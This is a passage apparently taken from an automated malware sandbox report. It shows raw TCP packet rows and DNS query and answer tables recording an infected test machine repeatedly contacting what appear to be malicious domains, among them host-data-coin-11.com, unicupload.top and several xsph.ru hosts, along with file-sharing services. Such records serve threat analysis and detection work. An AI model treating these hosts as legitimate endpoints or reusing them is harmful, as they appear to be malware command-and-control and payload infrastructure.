                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245333910 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245384932 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245397091 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245434999 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245481968 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245484114 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245532990 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245578051 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245582104 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245631933 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245680094 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315327883 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315403938 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315457106 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315471888 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315540075 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315593958 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315630913 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315644979 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315711021 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315716982 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315762043 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315813065 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315826893 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315862894 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315912962 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315920115 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.315963030 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316011906 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316025019 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316061974 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316111088 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316123009 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316160917 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316210032 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316215038 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316260099 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316308975 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316312075 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316360950 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.316416979 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385011911 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385076046 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385128975 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385140896 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385181904 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385229111 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385232925 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385283947 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385329962 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385337114 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385387897 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385437965 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385438919 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385497093 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385549068 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385565996 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385606050 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385658026 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385658026 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385710001 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385756969 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385760069 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385818958 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385853052 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385916948 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385922909 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385970116 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.385973930 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.386023998 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.386068106 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.386073112 CET804975389.223.65.17192.168.2.5

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.068125010 CET192.168.2.58.8.8.80xa222Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.522274017 CET192.168.2.58.8.8.80x1dacStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.762934923 CET192.168.2.58.8.8.80x3779Standard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:49.101771116 CET192.168.2.58.8.8.80xc7a1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:49.602319002 CET192.168.2.58.8.8.80x6825Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:49.792771101 CET192.168.2.58.8.8.80x32abStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:50.012084007 CET192.168.2.58.8.8.80x8894Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:50.247939110 CET192.168.2.58.8.8.80x737bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:51.090269089 CET192.168.2.58.8.8.80xd2c8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:52.477201939 CET192.168.2.58.8.8.80x6d65Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:52.706748009 CET192.168.2.58.8.8.80x9137Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:52.900149107 CET192.168.2.58.8.8.80x94ccStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:58.898350954 CET192.168.2.58.8.8.80x1aacStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:59.098107100 CET192.168.2.58.8.8.80xe35fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:59.327708006 CET192.168.2.58.8.8.80x8438Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:59.674631119 CET192.168.2.58.8.8.80xe561Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:59.864639997 CET192.168.2.58.8.8.80x704aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.076483965 CET192.168.2.58.8.8.80x5d01Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.225028038 CET192.168.2.58.8.8.80x7970Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.468554020 CET192.168.2.58.8.8.80xe4e9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.660439968 CET192.168.2.58.8.8.80x4743Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.858905077 CET192.168.2.58.8.8.80x519aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:01.054914951 CET192.168.2.58.8.8.80xd873Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:01.209578991 CET192.168.2.58.8.8.80xda71Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:01.414587975 CET192.168.2.58.8.8.80x4d1bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:01.599988937 CET192.168.2.58.8.8.80x2fd5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:03.951637030 CET192.168.2.58.8.8.80x976cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.237740993 CET192.168.2.58.8.8.80x31e8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.671008110 CET192.168.2.58.8.8.80xc580Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:04.939270973 CET192.168.2.58.8.8.80x41f1Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:06.717139959 CET192.168.2.58.8.8.80x90adStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:06.937068939 CET192.168.2.58.8.8.80x7076Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:07.161817074 CET192.168.2.58.8.8.80x9148Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:19.001461029 CET192.168.2.58.8.8.80xa28dStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:21.695975065 CET192.168.2.58.8.8.80x5f1aStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:26.991641045 CET192.168.2.58.8.8.80xc31bStandard query (0)srtuiyhuali.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.102307081 CET192.168.2.58.8.8.80xfdafStandard query (0)fufuiloirtu.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:27.401127100 CET192.168.2.58.8.8.80xd20fStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:28.449157000 CET192.168.2.58.8.8.80x677aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:28.648585081 CET192.168.2.58.8.8.80xeac7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:28.864703894 CET192.168.2.58.8.8.80xaf9dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:29.094826937 CET192.168.2.58.8.8.80x391eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:29.316817999 CET192.168.2.58.8.8.80x269dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:29.844449997 CET192.168.2.58.8.8.80xcc97Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:31.447838068 CET192.168.2.58.8.8.80x12feStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.099167109 CET192.168.2.58.8.8.80xc397Standard query (0)unic11m.topA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:32.174964905 CET192.168.2.58.8.8.80x4747Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.128079891 CET192.168.2.58.8.8.80xaf8dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.340699911 CET192.168.2.58.8.8.80x10d6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.422482967 CET192.168.2.58.8.8.80xffceStandard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.560332060 CET192.168.2.58.8.8.80xc629Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.560527086 CET192.168.2.58.8.8.80xe0bfStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:34.753875971 CET192.168.2.58.8.8.80x5b0cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.005836964 CET192.168.2.58.8.8.80x8a73Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.208940983 CET192.168.2.58.8.8.80x5e72Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.405631065 CET192.168.2.58.8.8.80x4282Standard query (0)bitly.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.613956928 CET192.168.2.58.8.8.80x3f02Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:35.803725958 CET192.168.2.58.8.8.80x95fdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:36.023104906 CET192.168.2.58.8.8.80x1073Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:39.749269009 CET192.168.2.58.8.8.80x701eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.010328054 CET192.168.2.58.8.8.80x2760Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.206621885 CET192.168.2.58.8.8.80xa59cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.420351028 CET192.168.2.58.8.8.80x9126Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:40.626512051 CET192.168.2.58.8.8.80x5442Standard query (0)www.mediafire.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.345593929 CET192.168.2.58.8.8.80x6e9fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.560367107 CET192.168.2.58.8.8.80x6967Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:41.754925966 CET192.168.2.58.8.8.80xecbbStandard query (0)www.mediafire.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:42.468024015 CET192.168.2.58.8.8.80x8583Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:42.671868086 CET192.168.2.58.8.8.80xdb32Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:42.878957033 CET192.168.2.58.8.8.80xda5bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.082484007 CET192.168.2.58.8.8.80xace2Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.530966997 CET192.168.2.58.8.8.80xe291Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.755482912 CET192.168.2.58.8.8.80xbe44Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:43.944658041 CET192.168.2.58.8.8.80x50d2Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:44.127238989 CET192.168.2.58.8.8.80xfbffStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:44.359674931 CET192.168.2.58.8.8.80xb809Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:46.159487963 CET192.168.2.58.8.8.80xfe7dStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.899182081 CET192.168.2.58.8.8.80xbcb0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:47.899224043 CET192.168.2.58.8.8.80x75bdStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.156876087 CET192.168.2.58.8.8.80xe695Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.337910891 CET192.168.2.58.8.8.80xe22Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.527611971 CET192.168.2.58.8.8.80xf446Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:48.782988071 CET192.168.2.58.8.8.80xe2bcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:49.615017891 CET192.168.2.58.8.8.80xf5c2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:50.413440943 CET192.168.2.58.8.8.80x229bStandard query (0)f0616068.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.840620041 CET192.168.2.58.8.8.80x552eStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:54.842330933 CET192.168.2.58.8.8.80x20b7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.032028913 CET192.168.2.58.8.8.80x7863Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.235112906 CET192.168.2.58.8.8.80x5562Standard query (0)vk.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.874588013 CET192.168.2.58.8.8.80x6dd4Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:55.889983892 CET192.168.2.58.8.8.80xb791Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.095582962 CET192.168.2.58.8.8.80xb3a8Standard query (0)natribu.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.359882116 CET192.168.2.58.8.8.80x463Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.645442963 CET192.168.2.58.8.8.80xeeb3Standard query (0)natribu.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:56.882695913 CET192.168.2.58.8.8.80x6c1fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:57.091738939 CET192.168.2.58.8.8.80xd80fStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:57.651737928 CET192.168.2.58.8.8.80x77faStandard query (0)mstdn.socialA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.141839981 CET192.168.2.58.8.8.80x9f39Standard query (0)qoto.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:58.661042929 CET192.168.2.58.8.8.80x21acStandard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:01.010947943 CET192.168.2.58.8.8.80x38e7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.255312920 CET192.168.2.58.8.8.80xcf58Standard query (0)amogohuigotuli.atA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:02.317835093 CET192.168.2.58.8.8.80x99Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:13.948523045 CET192.168.2.58.8.8.80x644dStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:15.646044970 CET192.168.2.58.8.8.80xfa2cStandard query (0)f0616071.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:18.409645081 CET192.168.2.58.8.8.80x635bStandard query (0)f0616073.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:25.871715069 CET192.168.2.58.8.8.80xc663Standard query (0)kent0mushinec0n3t.casacam.netA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:34:52.711987019 CET192.168.2.58.8.8.80x6309Standard query (0)patmushta.infoA (IP address)IN (0x0001)

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.353008986 CET8.8.8.8192.168.2.50xa222No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.541034937 CET8.8.8.8192.168.2.50x1dacNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.085211992 CET8.8.8.8192.168.2.50x3779No error (0)privacytools-foryou-777.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:49.419750929 CET8.8.8.8192.168.2.50xc7a1No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:49.620958090 CET8.8.8.8192.168.2.50x6825No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:49.810087919 CET8.8.8.8192.168.2.50x32abNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:50.031019926 CET8.8.8.8192.168.2.50x8894No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:50.579771042 CET8.8.8.8192.168.2.50x737bNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:51.108448029 CET8.8.8.8192.168.2.50xd2c8No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:52.495677948 CET8.8.8.8192.168.2.50x6d65No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:52.725264072 CET8.8.8.8192.168.2.50x9137No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:53.194371939 CET8.8.8.8192.168.2.50x94ccNo error (0)data-host-coin-8.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:58.915494919 CET8.8.8.8192.168.2.50x1aacNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:59.117124081 CET8.8.8.8192.168.2.50xe35fNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:59.346348047 CET8.8.8.8192.168.2.50x8438No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:59.693615913 CET8.8.8.8192.168.2.50xe561No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:32:59.883378983 CET8.8.8.8192.168.2.50x704aNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.179717064 CET8.8.8.8192.168.2.50x5d01No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.243674040 CET8.8.8.8192.168.2.50x7970No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.487281084 CET8.8.8.8192.168.2.50xe4e9No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.679090023 CET8.8.8.8192.168.2.50x4743No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:00.875922918 CET8.8.8.8192.168.2.50x519aNo error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:01.073401928 CET8.8.8.8192.168.2.50xd873No error (0)data-host-coin-8.com89.223.65.17A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 4, 2022 19:33:01.228178024 CET8.8.8.8192.168.2.50xda71No error (0)host-data-coin-11.com89.223.65.17A (IP address)IN (0x0001)
